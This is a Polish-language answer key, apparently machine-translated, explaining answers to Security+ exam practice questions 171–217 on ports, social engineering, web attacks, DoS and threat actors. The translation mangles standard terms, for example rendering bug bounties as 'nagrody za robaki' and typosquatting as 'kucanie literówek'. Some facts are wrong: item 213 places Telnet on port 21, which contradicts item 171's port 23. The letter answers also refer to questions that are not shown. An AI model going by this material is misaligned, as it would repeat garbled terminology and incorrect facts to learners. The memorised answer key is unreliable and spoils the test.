171. B. Port TCP 23 jest zazwyczaj powiązany z Telnet, nieszyfrowanym protokołem zdalnej powłoki. Ponieważ Telnet wysyła swoje uwierzytelnianie i inny ruch w postaci jawnej (czysty/zwykły tekst), nie należy go używać, a firma Lucca powinna zidentyfikować to jako problem z konfiguracją związany z niezabezpieczonym protokołem.
172. B. Ataki eskalacji przywilejów skupiają się na zdobywaniu dodatkowych przywilejów. W tym przypadku Cameron wykorzystał fizyczny dostęp do systemu, aby go zmodyfikować, co pozwoliło mu na przeprowadzenie ataku eskalacji uprawnień jako nieuprzywilejowany użytkownik. Trojan wymagałby, aby plik zachowywał się tak, jak jest to pożądane, atak typu "odmowa usługi" uniemożliwiłby dostęp do systemu lub usługi, a pliki wymiany (lub pliki stronicowania) to miejsce na dysku używane do przechowywania zawartości pamięci podczas działania pamięci niski. Pliki wymiany mogą zawierać poufne dane, ale termin atak pliku wymiany nie jest powszechnie używany.
173. C. Typowe atrybuty cyberprzestępców, które powinieneś umieć opisać i wyjaśnić podczas egzaminu Security+, obejmują to, czy są to zagrożenia wewnętrzne czy zewnętrzne, ich poziom zaawansowania lub możliwości, zasoby lub finansowanie oraz zamiary lub motywacje. Liczba lat doświadczenia jest trudna do określenia dla wielu podmiotów zajmujących się zagrożeniami i nie jest bezpośrednim sposobem oceny ich zdolności, a zatem nie jest powszechnym atrybutem używanym do ich oceny.
174. B. Chociaż często zachęca się do angażowania ekspertów dziedzinowych, wymaganie niezależnego przeglądu zastrzeżonych algorytmów nie jest. Wiele algorytmów uczenia maszynowego jest wrażliwych, ponieważ stanowią część przewagi konkurencyjnej organizacji. Zapewnienie, że dane są bezpieczne i odpowiedniej jakości, zapewnienie bezpiecznego środowiska programistycznego i wymaganie kontroli zmian to wszystkie typowe praktyki bezpieczeństwa sztucznej inteligencji (AI)/uczenia maszynowego (ML).
175. A. Białe zespoły pełnią funkcję sędziów i zapewniają nadzór nad ćwiczeniami i konkursami z zakresu cyberbezpieczeństwa. Opcje B i C mogą przypominać o testach z białym i szarym polem, ale są tylko po to, aby cię zmylić. Zespoły ds. cyberbezpieczeństwa są zwykle określane kolorami takimi jak czerwony, niebieski i fioletowy jako najczęstszymi kolorami, a także białymi zespołami, o których wspomina zarys egzaminu Security+. Obrońcy w ćwiczeniu są częścią niebieskiej drużyny.
176. C. Nagrody za robaki są coraz bardziej powszechne i mogą być całkiem lukratywne. Witryny bug bounty dopasowują badaczy luk w zabezpieczeniach do organizacji, które są gotowe zapłacić za informacje o problemach z ich oprogramowaniem lub usługami. Czasami atakujący żądają okupu, ale nie jest to okup, ponieważ został dobrowolnie zapłacony w ramach systemu nagród. Ujawnienie dnia zerowego ma miejsce, gdy ujawniona zostanie luka w zabezpieczeniach, a organizacja nie została wcześniej poinformowana i nie pozwolono jej naprawić problemu. Na koniec możesz mieć wrażenie, że 10 000 USD to dzień wypłaty, ale termin ten nie jest używany jako termin techniczny i nie pojawia się na egzaminie.
177. A. Uprawnienia Linuksa można ustawić numerycznie, a 777 ustawia użytkownika, grupę i świat tak, aby wszyscy mieli dostęp do odczytu, zapisu i wykonywania całego katalogu /etc. Takie ustawienie uprawnień jest powszechnym obejściem sytuacji, gdy uprawnienia nie działają, ale mogą ujawnić dane lub sprawić, że pliki binarne będą mogły być wykonywane przez użytkowników, którzy nie powinni mieć do nich dostępu. Kiedy ustawiasz uprawnienia dla systemu, pamiętaj, aby ustawić je zgodnie z zasadą najmniejszych uprawnień: należy skonfigurować tylko te uprawnienia, które są wymagane dla roli lub zadania.
178. B. Footprinting to proces gromadzenia informacji o systemie komputerowym lub sieci, który może obejmować zarówno techniki aktywne, jak i pasywne. Mapowanie, odciski palców i agregacja nie są poprawnymi lub powszechnymi terminami dla tej praktyki.
179. C. Kiedy modemy telefoniczne były intensywnie używane, hakerzy przeprowadzali ćwiczenia wybierania wojennego, aby dzwonić pod wiele numerów telefonów w celu znalezienia modemów, które odpowiedzą. Kiedy sieci bezprzewodowe stały się normą, używano tego samego języka, co prowadziło do terminów takich jak chodzenie po wojnie, prowadzenie wojny, a nawet latanie na wojnie. Pozostałe opcje zostały wymyślone, ale należy pamiętać, że egzamin Security+ wymaga znajomości jazdy wojennej i latania wojennego.
180. B. Systemy oświetleniowe i użytkowe, a także SCADA, sterowniki PLC, CNC, aparatura naukowa i podobne urządzenia są rodzajami technologii operacyjnej. Ponieważ jest to atak rozproszony, którego wynikiem jest odmowa usługi, jest to atak typu rozproszona odmowa usługi (DDoS). Systemy OT są często izolowane lub w inny sposób chronione przed zdalnymi połączeniami sieciowymi, aby zapobiec tego typu atakom, ponieważ wiele urządzeń OT nie ma silnych zabezpieczeń ani częstych aktualizacji. Przepełnienie SCADA nie jest terminem używanym w branży, ale ataki DDoS sieciowe i aplikacyjne pojawiają się w zarysie egzaminu Security+ i musisz być w stanie odróżnić je od tego typu OT DDoS.
181. C. Fałszywy negatyw występuje w systemie skanującym luki w zabezpieczeniach, gdy skanowanie jest uruchamiane, a istniejący problem nie został zidentyfikowany. Może to wynikać z opcji konfiguracji, zapory lub innego ustawienia zabezpieczeń albo dlatego, że skaner luk w zabezpieczeniach w inny sposób nie jest w stanie wykryć problemu. Brakująca aktualizacja luki w zabezpieczeniach może stanowić problem, jeśli problem nie wskazuje wyraźnie, że definicje są w pełni aktualne. O ile luka nie jest tak nowa, że nie ma definicji, brak aktualizacji nie powinien stanowić problemu. Ciche łatanie odnosi się do techniki łatania, która nie wyświetla użytkownikom komunikatów o poprawce. Fałszywy alarm spowodowałby podatność, aby pokazać, że w rzeczywistości jej nie ma. Czasami dzieje się tak, gdy poprawka lub poprawka jest zainstalowana, ale aplikacja nie zmienia się w sposób, który pokazuje zmianę.
182. A. Refaktoryzacja programu za pomocą środków automatycznych może obejmować dodanie dodatkowego tekstu, komentarzy lub niefunkcjonalnych operacji, aby program miał inny podpis bez zmiany jego operacji. Zazwyczaj nie jest to operacja ręczna, ponieważ narzędzia antymalware mogą szybko znaleźć nowe wersje. Zamiast tego refaktoryzacja odbywa się za pomocą techniki polimorficznej lub mutacji kodu, która zmienia złośliwe oprogramowanie za każdym razem, gdy jest instalowane, aby uniknąć systemów opartych na sygnaturach.
183. B. Wojna hybrydowa to stosunkowo nowy termin opisujący wielokierunkowe ataki przeprowadzane jako część wojskowej lub narodowej strategii wojny politycznej, która wykorzystuje tradycyjne, asymetryczne i cybernetyczne techniki walki wraz z metodami wywierania wpływu w celu osiągnięcia celów.
184. C. To jest przykład mistyfikacji. Oszustwa są fałszywymi zagrożeniami bezpieczeństwa i ich zwalczanie może pochłaniać zarówno czas, jak i zasoby. Świadomość użytkowników i dobre nawyki do walidacji potencjalnych oszustw są użytecznymi sposobami na zapobieganie zużywaniu przez nich więcej czasu i energii niż powinny. Próba phishingu byłaby skierowana na dane uwierzytelniające lub inne informacje, nie wymienia się tutaj żadnych informacji o tożsamości w celu oszustwa tożsamości, a oszustwo związane z fakturą obejmuje fałszywą lub zmodyfikowaną fakturę.
185. B. Jest to próba nakłonienia serwera do wysłania żądania do siebie jako części wywołania API i jest to przykład fałszowania żądania po stronie serwera. Atak typu cross-site scripting wykorzystywałby przeglądarkę ofiary, a nie żądanie po stronie serwera, podobnie jak atak CSRF.
186. B. Polowanie na zagrożenia może obejmować różnorodne działania, takie jak fuzja danych wywiadowczych, łączenie wielu źródeł danych i kanałów o zagrożeniach oraz przeglądanie porad i biuletynów, aby zachować świadomość środowiska zagrożeń dla Twojej organizacji lub branży.
187. C. Hasła w pamięci są często przechowywane w postaci zwykłego tekstu do użytku. Oznacza to, że atakujący mogą je odzyskać, jeśli uzyskają dostęp do pamięci, w której przechowywane jest hasło, nawet jeśli jest to pamięć efemeryczna.
188. D. Usługa AIS używa STIX i TAXII. STIX i TAXII to otwarte standardy, które Departament Bezpieczeństwa Wewnętrznego rozpoczął i wykorzystuje do tego typu działań. Więcej o AIS można przeczytać tutaj: www.us-cert.gov/ais.
189. C. Faza rekonesansu testu penetracyjnego obejmuje zebranie informacji o celu, w tym informacji o domenie, informacji o systemie i danych o pracownikach, takich jak numery telefonów, nazwiska i adresy e-mail.
190. A. Angela podszywała się pod rzeczywistego pracownika firmy kurierskiej, aby uzyskać dostęp do firmy. Stroje firmowe są bardzo przydatnym elementem socjotechniki osobistej. Wielorybnictwo to rodzaj ataku phishingowego wymierzonego w liderów organizacji. Atak wodopoju wdraża złośliwe oprogramowanie lub inne narzędzia ataku w witrynie lub witrynach, z których często korzysta grupa docelowa. Przewidywanie jest niejasno zdefiniowane przez egzamin Security+, ale może oznaczać wiele rzeczy. Kiedy widzisz przed egzaminem, powinno to zwykle oznaczać "dodanie czegoś na początku tekstu".
191. D. Nabywanie za pośrednictwem szarej strefy może prowadzić do braku wsparcia dostawcy, braku gwarancji i niemożności sprawdzenia, skąd pochodzą urządzenia. Nick powinien wyrazić obawy dotyczące łańcucha dostaw, a jeśli jego urządzenia muszą pochodzić z zaufanego źródła lub dostawcy z prawdziwym wsparciem, może być zmuszony do zmiany praktyk pozyskiwania w swojej organizacji.
192. B. Wstrzykiwanie XML jest często wykonywane przez modyfikację zapytań HTTP wysyłanych do usługi sieciowej opartej na XML. Przeglądanie dzienników serwera internetowego w celu sprawdzenia, co zostało wysłane, i przeanalizowanie ich pod kątem potencjalnych ataków pomoże Christinie sprawdzić, czy w dziennikach widoczne są nieoczekiwane dane wprowadzone przez użytkownika. Syslog, dzienniki uwierzytelniania i dzienniki zdarzeń prawdopodobnie nie zawierają informacji o aplikacjach internetowych, które wskazywałyby na atak oparty na wstrzykiwaniu XML. Użyj poniższego scenariusza dla pytań 193-195. Frank jest głównym pracownikiem IT w małej firmie i przeprowadził migrację infrastruktury swojej firmy z lokalnego centrum danych do dostawcy infrastruktury w chmurze jako usługi (IaaS). Ostatnio otrzymywał raporty, że jego strona internetowa wolno reaguje i czasami jest niedostępna. Szczerze uważa, że napastnicy mogą przeprowadzać atak odmowy usługi na jego organizację.
193. Najlepszą opcją C. Franka jest przejrzenie narzędzi zabezpieczających przed atakami typu "odmowa usługi" i innych narzędzi bezpieczeństwa, które zapewnia jego dostawca usług hostingowych w chmurze, i odpowiednie ich wykorzystanie. Główni dostawcy infrastruktury jako usługi (IaaS) mają różne narzędzia zabezpieczające, które mogą pomóc zarówno w wykrywaniu, jak i zapobieganiu atakom DoS w celu usunięcia witryn hostowanych w ich infrastrukturze. Dzwonienie do dostawcy usług w chmurze nie zadziała, ponieważ dostawca usług internetowych współpracuje z dostawcą usług w chmurze, a nie z Frankiem! Możliwe, że dostawca usług w chmurze byłby w stanie pomóc Frankowi, ale najprawdopodobniej poinstruują go, aby korzystał z istniejących narzędzi, które już udostępnia.
194. C. Ponieważ Frank korzysta z usług internetowych dostawcy usług w chmurze, będzie musiał przejrzeć przechwycone przez nich logi. Jeśli ich nie skonfigurował, będzie musiał to zrobić, a następnie będzie potrzebować usługi lub zdolności do ich analizy pod kątem rodzajów ruchu, którymi się interesuje. Dzienniki Syslog i Apache znajdują się na tradycyjnym hoście internetowym i byłyby odpowiednie, gdyby Frank prowadził własne serwery internetowe w środowisku infrastruktury jako usługi (IaaS).
195. B. Najbardziej przydatne dane prawdopodobnie pochodzą z IPS lub systemu zapobiegania włamaniom. Będzie mógł określić, czy atak jest atakiem typu "odmowa usługi" (DoS), a IPS może mu pomóc w ustaleniu źródła ataku typu "odmowa usługi". Zapora może dostarczyć pewnych przydatnych informacji, ale pokazywałaby tylko, czy ruch jest dozwolony, i nie analizowałaby go pod kątem informacji o ataku. Skaner luk w zabezpieczeniach wskazałby, czy wystąpił problem z jego aplikacją lub serwerem, ale nie zidentyfikuje tego typu ataku. Oprogramowanie chroniące przed złośliwym oprogramowaniem może pomóc w znalezieniu złośliwego oprogramowania w systemie, ale nie jest skuteczne w przypadku ataku DoS.
196. D. Warunki umowne, audyty i przeglądy bezpieczeństwa są powszechnymi środkami zmniejszania ryzyka stron trzecich podczas pracy z dostawcą wykonujący prace związane z integracją systemów. Raport SOC (kontrola organizacji usługowej) jest zwykle wymagany, jeśli zamierzasz korzystać z centrum danych lub usług hostowanych dostawcy zewnętrznego.
197. B. Szkolenie systemu sztucznej inteligencji (AI) lub uczenia maszynowego (ML) ze skażonymi danymi jest poważnym problemem. Elias musi upewnić się, że ruch w jego sieci jest typowy i niezłośliwy, aby sztuczna inteligencja nie zakładała, że złośliwy ruch jest normalny dla jego sieci.
198. C. Najczęstszą motywacją haktywistów jest wygłoszenie oświadczenia politycznego. Zyski reputacyjne są często kojarzone ze script kiddies, podczas gdy zyski finansowe są najczęściej celem zorganizowanej przestępczości lub groźby poufnych. Gromadzenie danych o wysokiej wartości jest typowe zarówno dla podmiotów państwowych, jak i przestępczości zorganizowanej.
199. D. Narzędzia do analizy predykcyjnej wykorzystują duże ilości danych, w tym informacje o trendach i zagrożeniach bezpieczeństwa, duże zbiory danych bezpieczeństwa z różnych narzędzi bezpieczeństwa i innych źródeł oraz wzorce zachowań, aby przewidywać i identyfikować złośliwe i podejrzane zachowanie.
200. C. Oszustwa związane z tożsamością i kradzież tożsamości często wykorzystują numery ubezpieczenia społecznego w ramach kradzieży tożsamości. Tailgating polega na podążaniu za osobą przez drzwi lub bramę bezpieczeństwa, dzięki czemu nie musisz przedstawiać poświadczeń ani kodu, podczas gdy podszywanie się to technika socjotechniczna, w której twierdzisz, że jesteś kimś innym. Szantaż jest potencjalną odpowiedzią, ale najczęstszym zastosowaniem jest oszustwo związane z tożsamością.
201. A. Narzędzia SOAR, takie jak narzędzia do zarządzania informacjami o zabezpieczeniach i zdarzeniami (SIEM), są silnie skoncentrowane na operacjach związanych z bezpieczeństwem. Obejmują one zarządzanie zagrożeniami i lukami w zabezpieczeniach, reagowanie na incydenty związane z bezpieczeństwem oraz operacje związane z bezpieczeństwem i narzędzia do automatyzacji, ale nie zapewniają narzędzi do analizy i testowania kodu źródłowego.
202. B. Zarys egzaminu Security+ wyszczególnia te elementy jako wektory zagrożeń. Chociaż istnieje wiele innych, powinieneś znać bezpośredni dostęp, łączność bezprzewodową, pocztę e-mail, łańcuch dostaw, media społecznościowe, nośniki wymienne i chmurę jako wektory egzaminu.
203. C. Chociaż na początku może się to wydawać dziwne, zarówno SourceForge, jak i GitHub służy do przechowywania przykładowego kodu exploita, a także innych informacji, które mogą być przydatne dla analityków analizy zagrożeń. Nie są częścią ciemnej sieci, ani nie są źródłem automatycznego udostępniania wskaźników (AIS) ani publicznym centrum wymiany informacji.
204. B. Zaufanie, a nie sprawdzanie poprawności danych wejściowych, jest główną przyczyną niewłaściwej obsługi danych wejściowych. Wszystkie dane wejściowe powinny być uważane za potencjalnie złośliwe, a zatem traktowane jako niezaufane. Należy przeprowadzić odpowiednie filtrowanie, walidację i testowanie, aby upewnić się, że tylko prawidłowe dane wejściowe są akceptowane i przetwarzane.
205. C. Kod jest przykładem skryptu PowerShell, który pobiera plik do pamięci. Możesz wykluczyć opcje przesyłania, czytając skrypt, ponieważ w przykładzie skryptu wspomina się o pobieraniu. Ponieważ widzimy pobierany ciąg znaków, a nie plik i lokalizację, możesz zgadnąć, że jest to przykład bezplikowego złośliwego oprogramowania.
206. C. Identyfikatory sesji powinny być unikalne dla różnych użytkowników i systemów. Bardzo podstawowy rodzaj ataku polegającego na odtwarzaniu sesji obejmuje dostarczenie ofierze identyfikatora sesji, a następnie użycie tego identyfikatora sesji po skorzystaniu z łącza i uwierzytelnieniu się. Zabezpieczenia, takie jak limity czasu sesji i szyfrowanie danych sesji , a także kodowanie źródłowego adresu IP, nazwy hosta lub innych informacji identyfikujących w kluczu sesji, może pomóc zapobiec atakom polegającym na odtwarzaniu sesji.
207. B. Zarys egzaminu Security+ wymienia siedem głównych kategorii wpływu, w tym utratę danych, naruszenia danych i eksfiltrację danych. Modyfikacja danych nie jest wymieniona, ale stanowi problem w ramach integralności triady CIA.
208. C. Czasopisma akademickie są najwolniejszymi z wymienionych pozycji ze względu na proces recenzowania związany z większością renomowanych czasopism. Chociaż czasopisma akademickie mogą być użytecznymi zasobami, zazwyczaj nie są one aktualnymi źródłami. Inne zasoby. Należy pamiętać o stronach internetowych dostawców, konferencjach, mediach społecznościowych i RFC (prośby o komentarze).
209. C. Skanowanie luk w zabezpieczeniach i skanowanie portów często można wykryć w dziennikach, szukając serii portów, do których jest podłączony. W tym przypadku dziennik został utworzony przez skanowanie systemu skanerem OpenVAS. Nic nie wskazuje na pomyślne zalogowanie lub inną próbę włamania, a uruchomienie usługi pojawi się w dzienniku wiadomości, a nie w dzienniku uwierzytelniania. Ponowne uruchomienie pojawiłoby się również w dzienniku wiadomości, a nie dziennik uwierzytelniania.
210. C. Chociaż kuszące może być natychmiastowe uaktualnienie, przeczytanie i zrozumienie CVE pod kątem luki w zabezpieczeniach jest dobrą najlepszą praktyką. Gdy Charles zrozumie problem, może go naprawić w oparciu o zalecenia dotyczące tego konkretnego problemu. Wyłączenie PHP lub serwera WWW spowodowałoby uszkodzenie usługi, aw tym przypadku tylko nowsze wersje PHP niż 5.4 mają łatkę, której potrzebuje Charles.
211. D. Chociaż 80 i 443 to najpopularniejsze porty HTTP, powszechną praktyką jest uruchamianie dodatkowych serwerów WWW na porcie 8080, gdy potrzebny jest port niestandardowy. Oczekuje się, że protokół SSH będzie znajdować się na porcie 22, RDP na 3389, a MySQL na 3306.
212. B. Po naprawieniu tego problemu Rick powinien zbadać, dlaczego system działał z wtyczką od 2007 roku. W wielu przypadkach, gdy odkryjesz taki podatny komponent, wskazuje to na głębszy problem, który istnieje w organizacji lub procesach dla utrzymanie systemu i aplikacji. Zainstalowanie zapory sieciowej (WAF) lub przeglądanie dzienników systemu zapobiegania włamaniom (IPS) może być przydatne, jeśli Rick uważa, że trwają ataki lub że ataki zakończyły się sukcesem, ale problem nic na ten temat nie wskazuje. Nic nie wskazuje na kompromis, a jedynie na całkowicie przestarzałą wersję wtyczki w problemie. Jeśli chcesz przetestować przykładowy system z podatnymi wtyczkami, takimi jak ta, możesz pobrać wersję 2015 maszyny wirtualnej Open Web Application Security Project (OWASP) z uszkodzonymi aplikacjami internetowymi. Posiada szeroką gamę całkowicie nieaktualnych aplikacji i usług, przeciwko którym można ćwiczyć.
213. C. Urządzenie sieciowe z uruchomionym SSH i serwerem sieciowym na porcie 443 TCP jest bardzo typowym wykrywaniem podczas skanowania luk w zabezpieczeniach. Bez żadnych wykrytych problemów Carolyn powinna po prostu zauważyć, że widziała te usługi. Telnet działa na porcie 21, niezaszyfrowany serwer sieciowy będzie w większości przypadków działał na protokole TCP 80, a udziały plików systemu Windows używają różnych portów, w tym portów TCP 135-139 i 445.
214. B. Przeglądy konfiguracji, przy użyciu zautomatyzowanego narzędzia lub ręcznej walidacji, mogą być użytecznym proaktywnym sposobem zapewnienia, że niepotrzebne porty i usługi nie są dostępne. Narzędzia do zarządzania konfiguracją mogą również pomóc w zapewnieniu, że oczekiwane konfiguracje są na miejscu. Ani pasywne, ani aktywne przechwytywanie pakietów sieciowych nie pokaże usług, do których nie można uzyskać dostępu, co oznacza, że otwarte porty mogą zostać pominięte, a przegląd dziennika również nie pokaże wszystkich otwartych portów.
215. C. Błędy są uważane za podatność, ponieważ często dostarczają dodatkowych szczegółów dotyczących systemu lub jego konfiguracji. Zazwyczaj nie można ich użyć do bezpośredniego wykorzystania lub awarii systemu.
216. D. Wygląda na to, że jest to sytuacja, w której serwer DNS Twojej sieci jest zagrożony i wysyła ludzi na fałszywą stronę. Koń trojański to złośliwe oprogramowanie powiązane z legalnym programem. Spoofing IP polegałby na użyciu fałszywego adresu IP, ale nie jest to opisane w tym scenariuszu. W rzeczywistości użytkownicy nawet nie wpisują adresów IP - wpisują adresy URL. Clickjacking polega na nakłanianiu użytkowników do kliknięcia czegoś innego niż to, co zamierzali.
217. C. To klasyczny przykład kucania literówek. Witryna jest wyłączona tylko jedną lub dwiema literami; osoba atakująca ma nadzieję, że użytkownicy prawdziwej witryny błędnie wpiszą adres URL i zostaną przeniesieni na swoją fałszywą witrynę. Przejęcie sesji polega na przejęciu sesji uwierzytelnionej. Fałszowanie żądań między witrynami powoduje wysyłanie fałszywych żądań do witryny, która rzekomo pochodzi od zaufanego, uwierzytelnionego użytkownika. Clickjacking próbuje nakłonić użytkowników do kliknięcia czegoś innego niż to, co zamierzali.
